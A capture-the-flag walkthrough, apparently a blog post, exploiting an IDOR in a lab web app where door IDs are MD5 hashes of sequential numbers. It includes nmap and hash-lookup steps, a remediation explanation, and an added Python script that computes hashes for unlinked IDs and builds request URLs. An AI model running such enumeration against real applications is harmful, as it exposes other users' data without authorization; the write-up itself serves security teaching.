
IDOR Vulnerability

Updated: Sep 29, 2023


Image showing computer that says IDOR.

Running NMAP


After starting the AttackBox, we run an nmap scan against the supplied IP address. The scan shows that the HTTP service on port 80 is open, so the web application is our target.

Scanning for hosts using nmap.

Inspecting page source


When accessing the website, all we see is a generic website with an image.

Home page.

Pressing CTRL+U (or right-click and View Page Source) shows the page source, which contains a set of hash values that appear to point to each of the doors. The application is using these hashes as the identifiers in the query component of its URLs.

Viewing the page source.

Hash-identifier


I open my Kali Linux machine in VirtualBox and run hash-identifier against the hashed values to work out which hash algorithm was used, so I can find out what value (if any) each hashed string in the query component of the URL refers to.


Trying one of the strings shows that it is most likely an MD5 hash. Note that hash-identifier only guesses from the length and character set, so a 32-character hexadecimal string could also be another 128-bit digest (NTLM, for example); the lookup in the next step is what actually confirms it.

Using hash-identifier.

Looking one of the strings up on crackstation.net shows that the hashes are simply MD5 digests of the numeric value assigned to each door. The value for this door is 2.

Crackstation.net.

Since the identifiers are just MD5 hashes of small numbers, we can use CyberChef to hash values of our own choosing and inject the resulting MD5 digest into the query to reach doors that are not linked from the page, and find the flag.


Typing 2 into the input gives us the same hash as the one we see in crackstation.net.

Trying hash algorithm with MD5.

Trying the number 0 gives us this hash.

Checking other values.

Putting the string in crackstation.net confirms that the value is 0.

Checking the hash value in Crackstation again.

Pasting this hash into the query component after the IP address in the URL retrieves the flag. This is the IDOR: the application treats the hashed identifier as proof that we are allowed to see that door, but hashing a predictable sequential ID is obfuscation, not access control. Anyone who can guess the next ID can compute its hash, so the server must check authorization for every object it returns, or use identifiers that cannot be derived (for example, random tokens) and still perform that check.

Finding the flag.
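The same hashing and lookup work done above in hash-identifier, crackstation.net and CyberChef can be automated. The following Python script is an added example written for this post, not code from the room: it builds a small table of MD5 digests of sequential integers, recovers the door numbers behind the hashes seen in the page source, and generates the query URLs for the doors that are not linked. The three page-source hashes are constructed for the example (MD5 of "1", "2" and "3"), and the base URL and the query parameter name are assumptions, since the post does not give them.

```python
import hashlib
from urllib.parse import urlencode

# Constructed sample: hashes as they would appear in the page source.
# These are md5("1"), md5("2") and md5("3"), not values copied from the room.
PAGE_SOURCE_HASHES = [
    "c4ca4238a0b923820dcc509a6f75849b",
    "c81e728d9d4c2f636f067f89cc14862c",
    "eccbc87e4b5ce2fe28308fd9f2a7baf3",
]

# Assumptions: the room's real host and parameter name are not in the post.
BASE_URL = "http://TARGET"
PARAM = "id"


def md5_hex(value):
    """MD5 of the decimal string form of value, as CyberChef produces it."""
    return hashlib.md5(str(value).encode()).hexdigest()


def build_table(limit=1000):
    """Map md5(str(i)) -> i for 0 <= i < limit.

    This is the same idea as a CrackStation lookup, restricted to the
    small integer space an application is likely to use for door numbers.
    """
    return {md5_hex(i): i for i in range(limit)}


def recover_ids(hashes, table):
    """Resolve each page-source hash to its door number (None if unknown)."""
    return {h: table.get(h) for h in hashes}


def candidate_urls(known_ids, limit=10):
    """Build request URLs for ids in 0..limit-1 that the page did not link.

    These are the IDOR candidates: objects the application never showed us
    but whose identifier we can compute.
    """
    unlinked = [i for i in range(limit) if i not in known_ids]
    return [f"{BASE_URL}/?{urlencode({PARAM: md5_hex(i)})}" for i in unlinked]


if __name__ == "__main__":
    table = build_table()
    recovered = recover_ids(PAGE_SOURCE_HASHES, table)
    for h, door in recovered.items():
        print(f"{h} -> door {door}")
    known = {d for d in recovered.values() if d is not None}
    for url in candidate_urls(known, limit=5):
        print("try:", url)
```

Run it with the hashes copied from the real page source in place of the constructed ones; any hash that resolves to None is either outside the integer range tried or not a plain MD5 of a number, and is worth a closer look rather than a larger brute-force.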

Try the Room yourself here:




1 comment

Guest:
Jun 7, 2023
Rated 4 out of 5 stars.

Thanks.